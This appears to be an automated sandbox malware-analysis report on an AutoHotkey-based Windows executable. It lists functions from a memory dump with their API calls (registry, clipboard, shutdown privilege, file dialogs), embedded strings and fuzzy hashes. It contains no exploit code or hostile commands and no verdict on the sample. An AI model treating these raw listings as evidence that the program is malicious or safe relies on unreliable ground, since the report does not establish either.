Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: <>=/|^,:*&~!()[]{}+-?."$"%s" requires at least %d parameter%s.$"%s" requires that parameter #%u be non-blank.$+$Invalid hotkey.$MZ@$Parameter #1 required$Syntax error or too many variables in "For" statement.$This "For" is missing its "in".$This line does not contain a recognized action.$new$]
API String ID: 0-2616766476
Opcode ID: edc8b57694c6b9819aaa9256c1b17bac262cc13fc610e69ad94638e1bc5b5081
Instruction ID: f9ee50731e1e652c43fb86271a4e850f36427dfdbec3113ac8352bcdf9aefd16
Opcode Fuzzy Hash: edc8b57694c6b9819aaa9256c1b17bac262cc13fc610e69ad94638e1bc5b5081
Instruction Fuzzy Hash: DFD2D07260468185EB769F26E4503FD73A1F7987C4F948116FB8A4B6F8EB7AC881D700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140083150, Relevance: 19.8, APIs: 13, Instructions: 283registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000140083203
RegQueryValueExW.ADVAPI32 ref: 000000014008322E
RegCloseKey.ADVAPI32 ref: 0000000140083265
RegQueryValueExW.ADVAPI32 ref: 000000014008329B
RegCloseKey.ADVAPI32 ref: 00000001400832B9
GetLastError.KERNEL32 ref: 00000001400832C8
RegQueryValueExW.ADVAPI32 ref: 00000001400832F4
RegQueryValueExW.ADVAPI32 ref: 0000000140083364
RegCloseKey.ADVAPI32 ref: 0000000140083370
RegQueryValueExW.ADVAPI32 ref: 000000014008344C
RegCloseKey.ADVAPI32 ref: 0000000140083488
RegQueryValueExW.ADVAPI32 ref: 00000001400834C2
RegCloseKey.ADVAPI32 ref: 00000001400834CE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: QueryValue$Close$ErrorLastOpen
String ID:
API String ID: 738532287-0
Opcode ID: bcc4337a7efa42d52be63b7a00e3dec8421199196cc070f10d346cdffba38e0e
Instruction ID: dd11adc79eeb87447ffc564bb8a86ff2289d9c31989d0fbae79ad25ed68d3046
Opcode Fuzzy Hash: bcc4337a7efa42d52be63b7a00e3dec8421199196cc070f10d346cdffba38e0e
Instruction Fuzzy Hash: F7C1AE37A04A6086EB62DF26A8447DE27A1F78CBD8F146111FF4A53BB5DB38C984C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004B270, Relevance: 19.8, APIs: 5, Strings: 6, Instructions: 519COMMON

Download Yara Rule

APIs

wcsstr.LIBVCRUNTIME ref: 000000014004B58A

Strings

C:\Users\user\Desktop, xrefs: 000000014004B910
%s%c%s%cAll Files (*.*)%c*.*%c, xrefs: 000000014004B6AC
The maximum number of File Dialogs has been reached., xrefs: 000000014004B2C3
::{, xrefs: 000000014004B32B
Select File - %s, xrefs: 000000014004B436
All Files (*.*), xrefs: 000000014004B792

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: wcsstr
String ID: %s%c%s%cAll Files (*.*)%c*.*%c$::{$All Files (*.*)$C:\Users\user\Desktop$Select File - %s$The maximum number of File Dialogs has been reached.
API String ID: 2735924446-1896893277
Opcode ID: b528a492ae9013fbe6089ab717469ae2131d440885d9509fdd51dc94aa568759
Instruction ID: e9e9a9f5c98fb2ca7d894c309c592d4f66f444cfc533d2c874c1069875eb1187
Opcode Fuzzy Hash: b528a492ae9013fbe6089ab717469ae2131d440885d9509fdd51dc94aa568759
Instruction Fuzzy Hash: 5E32C13221168085EB26DF26E8513E923B0FB997E8F464225FB1A07BF5EF78C645C705

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000C260, Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 490COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A9358: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A9384

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97

COMRefPtr.MSPDB140-MSVCRT ref: 000000014000C776

Strings

Exist, xrefs: 000000014000C2D8
Nonexistent hotkey variant (IfWin)., xrefs: 000000014000C8C7
Target label does not exist., xrefs: 000000014000C4EF
MZ@, xrefs: 000000014000C844
IfWin, xrefs: 000000014000C277
Nonexistent hotkey., xrefs: 000000014000C68B
UseErrorLevel, xrefs: 000000014000C425
Out of memory., xrefs: 000000014000C7C4
Active, xrefs: 000000014000C2AB
Not, xrefs: 000000014000C29D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo
String ID: Active$Exist$IfWin$MZ@$Nonexistent hotkey variant (IfWin).$Nonexistent hotkey.$Not$Out of memory.$Target label does not exist.$UseErrorLevel
API String ID: 3215553584-2294268042
Opcode ID: f9b41abfc2f45577d60a3089fa3a14c614e55e26e5f37a8a71546d3031df4f19
Instruction ID: 14d24a1a0218d3dcd448695d4d42bd97b77f36e39671d260a56292cd773c8a12
Opcode Fuzzy Hash: f9b41abfc2f45577d60a3089fa3a14c614e55e26e5f37a8a71546d3031df4f19
Instruction Fuzzy Hash: 7A1226B262668081FB63DB27B510BEE2BA0A75D7D8F089205FF95076F2DB38C585D311

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140033380, Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 330registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000140033442
RegQueryInfoKeyW.ADVAPI32 ref: 000000014003348D
RegEnumValueW.ADVAPI32 ref: 000000014003350A
GetTickCount.KERNEL32 ref: 00000001400335EF
RegCloseKey.ADVAPI32 ref: 0000000140033688
RegEnumKeyExW.ADVAPI32 ref: 0000000140033700
RegCloseKey.ADVAPI32 ref: 000000014003359B

Part of subcall function 0000000140029AF0: GlobalUnWire.KERNEL32 ref: 0000000140029B8A
Part of subcall function 0000000140029AF0: CloseClipboard.USER32 ref: 0000000140029B99
Part of subcall function 0000000140029AF0: GetTickCount.KERNEL32 ref: 0000000140029BAE
Part of subcall function 0000000140029AF0: PeekMessageW.USER32 ref: 0000000140029BE3
Part of subcall function 0000000140029AF0: GetTickCount.KERNEL32 ref: 0000000140029BF7

GetTickCount.KERNEL32 ref: 00000001400337D8

Part of subcall function 0000000140029AF0: GetTickCount.KERNEL32 ref: 0000000140029CC7

RegCloseKey.ADVAPI32 ref: 000000014003392E

Strings

MZ@, xrefs: 00000001400335E0, 00000001400335FC, 00000001400337C9
%s%s%s, xrefs: 0000000140033881

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick$Close$Enum$ClipboardGlobalInfoMessageOpenPeekQueryValueWire
String ID: %s%s%s$MZ@
API String ID: 3874374163-1733240152
Opcode ID: 12a48660fd565cca727367cda2d1aad1f4a5ce79aab8c79fcc192203273ae2e8
Instruction ID: 7b8221f5117245229100a62bba1646fda72faab8a4ea5445045a4e2adc1d7622
Opcode Fuzzy Hash: 12a48660fd565cca727367cda2d1aad1f4a5ce79aab8c79fcc192203273ae2e8
Instruction Fuzzy Hash: AEF13F72604B9489EB62CF66E8803DE77A4F78CBD8F144216EB8D47BA8DB38C545C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140023630, Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 343COMMON

Download Yara Rule

APIs

__RTDynamicCast.LIBCMT ref: 0000000140023999

Strings

base.__Init(), xrefs: 0000000140023A1E
Duplicate declaration., xrefs: 0000000140023B7B
this, xrefs: 000000014002385B
Invalid class variable declaration., xrefs: 000000014002392A
Out of memory., xrefs: 0000000140023B6A
Unknown class var., xrefs: 00000001400238F8
%s.%.*s := %.*s, , xrefs: 0000000140023879
Declaration too long., xrefs: 0000000140023916
__Init, xrefs: 0000000140023961

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CastDynamic
String ID: %s.%.*s := %.*s, $Declaration too long.$Duplicate declaration.$Invalid class variable declaration.$Out of memory.$Unknown class var.$__Init$base.__Init()$this
API String ID: 3796249952-2290300046
Opcode ID: dc8f9e0170c1b5e69760dd38f3aeb971701d8ded019d5123573d5df8acaff1f1
Instruction ID: 2e82765cff8d73656303cf0960e1f2cc566a9c8602f3b50827be4b942719194d
Opcode Fuzzy Hash: dc8f9e0170c1b5e69760dd38f3aeb971701d8ded019d5123573d5df8acaff1f1
Instruction Fuzzy Hash: 90E16972604B8485EB629F26E4407EA77A4F74CBC4F44811AFF8907BA5EF78C891D742

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140096390, Relevance: 17.2, Strings: 13, Instructions: 912COMMON

Download Yara Rule

Strings

NO_START_OPT), xrefs: 000000014009655D
UTF16), xrefs: 0000000140096493
UCP), xrefs: 0000000140096500
CRLF), xrefs: 000000014009669E
ANYCRLF), xrefs: 000000014009677E
no error, xrefs: 0000000140096418, 0000000140097155
MZ@, xrefs: 0000000140096FC8
LF), xrefs: 000000014009662E
Error text not found (please report), xrefs: 0000000140097178
ANY), xrefs: 000000014009670E
BSR_ANYCRLF), xrefs: 00000001400967EE
BSR_UNICODE), xrefs: 0000000140096843
CR), xrefs: 00000001400965C0

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$Error text not found (please report)$LF)$MZ@$NO_START_OPT)$UCP)$UTF16)$no error
API String ID: 0-1038885284
Opcode ID: da5991f8b016925b7e72fa3bd6a636af43c6fc3f69c98d361f9f7540ebebff4b
Instruction ID: f4f6503808f73611ecbc3f7e08c22f90bb7568f568aef60f58066e59f1cd9b62
Opcode Fuzzy Hash: da5991f8b016925b7e72fa3bd6a636af43c6fc3f69c98d361f9f7540ebebff4b
Instruction Fuzzy Hash: 1C82E072A10B90CAEB268F26E4407EE77B4F7587D8F514216FB59877A4EB38C954C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140005280, Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 67clipboardCOMMON

Download Yara Rule

APIs

GetClipboardFormatNameW.USER32 ref: 00000001400052BA
GetClipboardData.USER32 ref: 0000000140005382

Strings

MSDEVLineSelect, xrefs: 0000000140005348
OwnerLink, xrefs: 00000001400052F4
ObjectLink, xrefs: 00000001400052DF
Embed Source, xrefs: 000000014000531E
Link Source, xrefs: 00000001400052C6
MSDEVColumnSelect, xrefs: 0000000140005333
Native, xrefs: 0000000140005309

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Clipboard$DataFormatName
String ID: Embed Source$Link Source$MSDEVColumnSelect$MSDEVLineSelect$Native$ObjectLink$OwnerLink
API String ID: 3172747766-1844231336
Opcode ID: 10a3594f36a10c6e50d722cadf51c313105cf668cbefeb4640153f92544ecffe
Instruction ID: f30d53cce221a6165054bc89aa4d91e157422b91ef0dac50e24ac31f33467884
Opcode Fuzzy Hash: 10a3594f36a10c6e50d722cadf51c313105cf668cbefeb4640153f92544ecffe
Instruction Fuzzy Hash: E8310CB2314B4191EB26EB26E4903EA63B4B75D3C5F884125BB89875F5EB7CC749CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140048270, Relevance: 14.6, APIs: 5, Strings: 3, Instructions: 559COMMON

Download Yara Rule

Strings

MZ@, xrefs: 000000014004831B
<<>>, xrefs: 0000000140048887, 0000000140048B92
Out of memory., xrefs: 0000000140048630, 00000001400486D6

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: <<>>$MZ@$Out of memory.
API String ID: 0-2842364066
Opcode ID: 076de97a5c0cf4cf5250175bd43bf1b50c968d1a4638b61b38f0e5ba925c2115
Instruction ID: c9b1d4a3735362655cb907219d159726a00fd82166513946a42083a7c82d6126
Opcode Fuzzy Hash: 076de97a5c0cf4cf5250175bd43bf1b50c968d1a4638b61b38f0e5ba925c2115
Instruction Fuzzy Hash: B432B172604A8485FB77DB26A4443EE27A0E75DBC4F4A4926FF8A476F5EB38C845C304

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400344D0, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 337clipboardCOMMON

Download Yara Rule

APIs

IsClipboardFormatAvailable.USER32 ref: 00000001400345BA
IsClipboardFormatAvailable.USER32 ref: 00000001400345C7

Part of subcall function 0000000140004C30: IsClipboardFormatAvailable.USER32 ref: 0000000140004C58
Part of subcall function 0000000140004C30: IsClipboardFormatAvailable.USER32 ref: 0000000140004C67

Strings

MZ@, xrefs: 0000000140034526, 0000000140034603, 0000000140034925
<<>>, xrefs: 00000001400345D6, 00000001400349B1

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AvailableClipboardFormat
String ID: <<>>$MZ@
API String ID: 778505046-2574836979
Opcode ID: d95a6ca896a2b1736a47bead4f00e92cf35d4da6ba2213ad5efc882ebce02ace
Instruction ID: d0839c6ae3987ec872c6a0af2b094ea4265d98d06deeabd23d3f59f4bbb9f004
Opcode Fuzzy Hash: d95a6ca896a2b1736a47bead4f00e92cf35d4da6ba2213ad5efc882ebce02ace
Instruction Fuzzy Hash: 97E1CF7260468186EB67DFA7A4443EB27A1F74DBC8F584116FB8A0B6F5DB38E845C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001270, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 97libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A2B14: RtlAcquirePebLock.NTDLL ref: 00000001400A2B24

GetModuleHandleW.KERNEL32 ref: 000000014001515C
GetProcAddress.KERNEL32 ref: 000000014001516C

Part of subcall function 00000001400A2AB4: RtlAcquirePebLock.NTDLL ref: 00000001400A2AC4
Part of subcall function 00000001400A2AB4: RtlLeaveCriticalSection.NTDLL ref: 00000001400A2B04

GetVersionExW.KERNEL32 ref: 00000001400151A6

Strings

ntdll.dll, xrefs: 0000000140015155
%u.%u.%u, xrefs: 00000001400151B2
10.0.17134, xrefs: 00000001400151D9
RtlGetVersion, xrefs: 0000000140015165

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AcquireLock$AddressCriticalHandleLeaveModuleProcSectionVersion
String ID: %u.%u.%u$10.0.17134$RtlGetVersion$ntdll.dll
API String ID: 336819936-3240200435
Opcode ID: c0fe5eb6ce6e183f4d858b32f5f7711c36935ff7494b074c367067881845237c
Instruction ID: 937256b28841e7a42b9e9dd22dc710e2f8d7dd63825e0ab74ea82bdd73688669
Opcode Fuzzy Hash: c0fe5eb6ce6e183f4d858b32f5f7711c36935ff7494b074c367067881845237c
Instruction Fuzzy Hash: F54163B07056C1DAFB17EB26AC553D53BA0A76EB48F880019D78A4BFB1DA7DC444C711

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400624E0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00000001400624E8
OpenProcessToken.ADVAPI32 ref: 00000001400624FB
LookupPrivilegeValueW.ADVAPI32 ref: 000000014006251B
AdjustTokenPrivileges.ADVAPI32 ref: 000000014006254C
GetLastError.KERNEL32 ref: 0000000140062552
ExitWindowsEx.USER32 ref: 0000000140062560

Strings

SeShutdownPrivilege, xrefs: 0000000140062514

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: ebb33053a39e8caa69871b8061676876d6652616186f994362947d906779d1bf
Instruction ID: 44545db6cc0edc7d828686ca3ca6d072109201a590c612806124eb485c3094dc
Opcode Fuzzy Hash: ebb33053a39e8caa69871b8061676876d6652616186f994362947d906779d1bf
Instruction Fuzzy Hash: 1E018F71219F4082EB598B62BC483DA63A1FB8C7D4F409029B64E83A74DF3CC559CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004C2D0, Relevance: 10.7, APIs: 7, Instructions: 218windowCOMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 000000014004C3A4
GetLastError.KERNEL32 ref: 000000014004C3F8
GetTickCount.KERNEL32 ref: 000000014004C440
PeekMessageW.USER32 ref: 000000014004C46C
GetTickCount.KERNEL32 ref: 000000014004C483
GetLastError.KERNEL32 ref: 000000014004C49C
CloseHandle.KERNEL32 ref: 000000014004C61F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountErrorLastTick$CloseHandleInfoMessagePeek
String ID:
API String ID: 405775314-0
Opcode ID: 9d1b76a5238fe08a495902ebcd8fde1a211dd5ee8ddeaec9681cb01d312a68a8
Instruction ID: 0c06daa4d14921b295ff1b46a6fd93cf71192050cbce9541b32724e5790d4986
Opcode Fuzzy Hash: 9d1b76a5238fe08a495902ebcd8fde1a211dd5ee8ddeaec9681cb01d312a68a8
Instruction Fuzzy Hash: 7EA16F72224B8086E7A6DB16E450BDA7760F789BE4F515325FBAA43BF4DB38C445CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140042240, Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32 ref: 0000000140042277
GetDIBits.GDI32 ref: 00000001400422BB
SelectObject.GDI32 ref: 0000000140042334
GetDIBits.GDI32 ref: 0000000140042364
GetSystemPaletteEntries.GDI32 ref: 000000014004239B
SelectObject.GDI32 ref: 0000000140042459
DeleteDC.GDI32 ref: 0000000140042465

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: BitsObjectSelect$CompatibleCreateDeleteEntriesPaletteSystem
String ID:
API String ID: 3388690935-0
Opcode ID: a60b3e6ee84313472ddd66b0129db10100318cab71b937aa562ed35eaf49d34d
Instruction ID: 5503a965b5104343ae0485ef54026f43cb5ed52a350064c8cac1dfdd8c2144f3
Opcode Fuzzy Hash: a60b3e6ee84313472ddd66b0129db10100318cab71b937aa562ed35eaf49d34d
Instruction Fuzzy Hash: E561BF36310B908AE766CF26E8403DA77A0F78DBC8F858425EF4987BA4DB38C605C714

Uniqueness

Uniqueness Score: -1.00%

Function 000000014006D6A0, Relevance: 10.2, Strings: 8, Instructions: 250COMMON

Download Yara Rule

Strings

ContextMenu, xrefs: 000000014006D8F3
DropFiles, xrefs: 000000014006D983
%sGui, xrefs: 000000014006D714
Close, xrefs: 000000014006D747
Escape, xrefs: 000000014006D7D3
Gui, xrefs: 000000014006D6F3
AutoHotkeyGUI, xrefs: 000000014006D6AF
Size, xrefs: 000000014006D863

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: %sGui$AutoHotkeyGUI$Close$ContextMenu$DropFiles$Escape$Gui$Size
API String ID: 0-89913139
Opcode ID: 5183c16f14deb1d988a4e9841c19a6c77b196675d88c3f782d8c9105eb201564
Instruction ID: 59664ed155b6e7b7b2eceb07a5a6dbbe70bf1e68645500b177da2aa0474ae0e8
Opcode Fuzzy Hash: 5183c16f14deb1d988a4e9841c19a6c77b196675d88c3f782d8c9105eb201564
Instruction Fuzzy Hash: A9B1B172B05A8086EF229F13E4403E977B1FB5DBC4F588A26EB8C476A5EB38C504C751

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400302E0, Relevance: 9.5, APIs: 2, Strings: 4, Instructions: 461COMMON

Download Yara Rule

Strings

, xrefs: 000000014003058A
., xrefs: 000000014003040D
., xrefs: 000000014003059F
, xrefs: 00000001400303F8

Memory Dump Source

